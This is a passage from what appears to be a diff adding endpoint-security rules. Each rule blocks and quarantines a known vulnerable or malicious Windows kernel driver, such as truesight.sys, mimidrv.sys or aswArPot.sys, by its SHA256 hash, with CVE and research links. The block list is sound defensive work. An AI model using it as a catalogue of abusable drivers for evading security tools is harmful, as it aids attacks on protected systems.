"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480956Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e34afe0a8c5459d13e7a11f20d62c7762b2a55613aaf6dbeb887e014b5f19295", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3ec6cce2-1c16-5ed1-9480-7ed8a899416d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500416Z", + "creation_date": "2026-03-23T11:45:31.500419Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500427Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "274c3fe5b6f2c2ff285b7c9e3820d18d1e262cd62006d83f1547644c45ae58aa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3ecc6f02-b25f-5fa7-9028-60ce0151e454", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811850Z", + "creation_date": "2026-03-23T11:45:31.811852Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811858Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b8ffe85d27244973559ee995f28e9a820a36916a1e89621ed5062cfe90d9efb3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3edadbfd-9720-58f0-afa7-ef69159fcf1b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454651Z", + "creation_date": "2026-03-23T11:45:30.454655Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454664Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7db320e49139f636c8b6d12b6c78b666a62599e9d59587ba87c6b89b0a34b18d", + "comment": "Vulnerable Kernel Driver (aka inpout32.sys) [https://www.loldrivers.io/drivers/97fa88f6-3819-4d56-a82c-52a492a9e2b5/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3edb0957-a5e0-5eea-9b12-9cf1deb3dc83", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147413Z", + "creation_date": "2026-03-23T11:45:31.147415Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147420Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19df09d385b0520c193171b372de92b13a008b7d1c74f8595e4ad3c867167e18", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3edf284f-db64-5b54-ba83-1d0f2dc13dde", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475301Z", + "creation_date": "2026-03-23T11:45:30.475304Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475313Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f6d7faddc3a56875a8d24e4785a139141dd892968f70bf0e37d505af9a3324fd", + "comment": "Vulnerable Kernel Driver (aka jokercontroller.sys) [https://www.loldrivers.io/drivers/4c815256-2534-4476-b15d-7cbf24c80098/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3eeaae41-f11c-59b5-92c6-72d7e858dcbd", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462890Z", + "creation_date": "2026-03-23T11:45:30.462893Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462902Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bc49cb96f3136c3e552bf29f808883abb9e651040415484c1736261b52756908", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3eebb93b-0cd2-5471-be03-4708539339d4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141523Z", + "creation_date": "2026-03-23T11:45:31.141525Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141531Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d739cc6794bae0f69c7f92d7441809484bf9bb8537291501e1e9475f9b0016e1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3ef99461-ac78-507a-b681-86bba9679fae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604555Z", + "creation_date": "2026-03-23T11:45:29.604557Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604563Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e330de98db81f9b183ef37d31e111301da669f1fc572e87acf8b8c2fe4e602b5", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f07d1c6-173d-5d42-990f-6a7974993426", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484974Z", + "creation_date": "2026-03-23T11:45:31.484977Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484987Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7b4005dfd853850dfa2560a6bbe94a22280d246e9d6cc23dff0c974eaa35e493", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f1dbd0d-d402-5a8c-ad3a-6f68a7da874e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147059Z", + "creation_date": "2026-03-23T11:45:31.147061Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147066Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8b2946c1805b365e2df58ed29cc0b77dd2afd2ea991621ae02dfaa5ceb4ba091", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f21316d-36dd-5908-8a11-8c4b5b65e80e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969947Z", + "creation_date": "2026-03-23T11:45:29.969950Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969955Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9e309324897edf07776adbb2b05252d7a2ad8140c6636bc28a5050e4ea183d40", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f3590d4-d9ae-5a8d-ab69-db72acfa76f9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.467090Z", + "creation_date": "2026-03-23T11:45:30.467094Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467104Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fc26cebb27c76c6e3d22da679cff81477cab4fcabfb6f5a8a27f596ab51713ae", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f37586b-5081-5ff4-a0b7-b987f51a43eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610672Z", + "creation_date": "2026-03-23T11:45:29.610674Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610679Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "955dac77a0148e9f9ed744f5d341cb9c9118261e52fe622ac6213965f2bc4cad", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"3f4b8ba5-d866-5f3d-879f-5c792a75e676", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.161010Z", + "creation_date": "2026-03-23T11:45:31.161013Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.161022Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8a8d3cc4e735124bbfe5187cf1b29305a77411ffd76c340b2d83497febb791a5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f4c553b-3825-5c61-85ee-af0677a6d51c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816937Z", + "creation_date": "2026-03-23T11:45:30.816939Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.816951Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "054f04dc0ba1b20701c6f44169ea0fdd27b01a8450a44cc273b0eb0c91cbdb68", + "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f4e3f34-478e-5d3e-96fe-8f9f4f4aa8d5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977225Z", + "creation_date": "2026-03-23T11:45:29.977227Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977232Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "047c1d5bb80826a6f66c182fc8b5f66f59609a71e734117f20a4f98b9866bde5", + "comment": "ASUS vulnerable VGA Kernel Mode Driver (aka EIO.sys) [https://www.loldrivers.io/drivers/f654ad84-c61d-477c-a0b2-d153b927dfcc/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f52d9f7-efc2-5c5f-8196-3fde5fffca5a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969523Z", + "creation_date": "2026-03-23T11:45:29.969525Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969531Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd3b38875c8b727f18cec382698624679d6413f02cf33d82a7c93b9595860b6d", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f595eb6-3947-593d-84da-03cce1c9ebdb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621985Z", + "creation_date": "2026-03-23T11:45:29.621987Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621992Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"e304e5d70d3f986f623fad7f4355d5218d8c1681e423b02db0946cbe1503eb76", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f5d6109-ab6e-5bd2-b200-9507e431d9e7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821018Z", + "creation_date": "2026-03-23T11:45:30.821023Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821032Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3e758221506628b116e88c14e71be99940894663013df3cf1a9e0b6fb18852b9", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f6a1a94-ee07-513b-b707-442307d5479b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:31.152649Z", + "creation_date": "2026-03-23T11:45:31.152651Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152657Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3bfb73ff837b9963ab2f7110b5996a08c569655c50809fbeea2efd74b7a6b5e7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f6b720b-1c8e-5109-bf4d-255fb7abb4cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812277Z", + "creation_date": "2026-03-23T11:45:31.812285Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812300Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6141922e84398c9f7ee3fd81240882650ce1074bcd5b577182ddafb066a2f71f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f6bcb6d-177e-5e80-a010-b261c41da1c6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150806Z", + "creation_date": "2026-03-23T11:45:31.150808Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150814Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "378150056e2c300fcb7d133f7c22e7a27f434532ee0c39dd0c16b433f47383b2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f6c15cc-88e9-5d7c-b0d5-205e9e88450e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495492Z", + "creation_date": "2026-03-23T11:45:31.495494Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495500Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c77dc659c0fc9018f485b2ad49b94e503cbdb36287adf8b753c48b6d4c6e574b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f72f9ac-7ba3-5868-b435-cdce16001c32", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487326Z", + "creation_date": "2026-03-23T11:45:31.487328Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487334Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d73b8a36374d9b20ec0b8c1157a51905b35efe1bca399ec9bb21f45b51174ef4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f8833ff-d0da-577a-98bf-a29ff1ff6404", + 
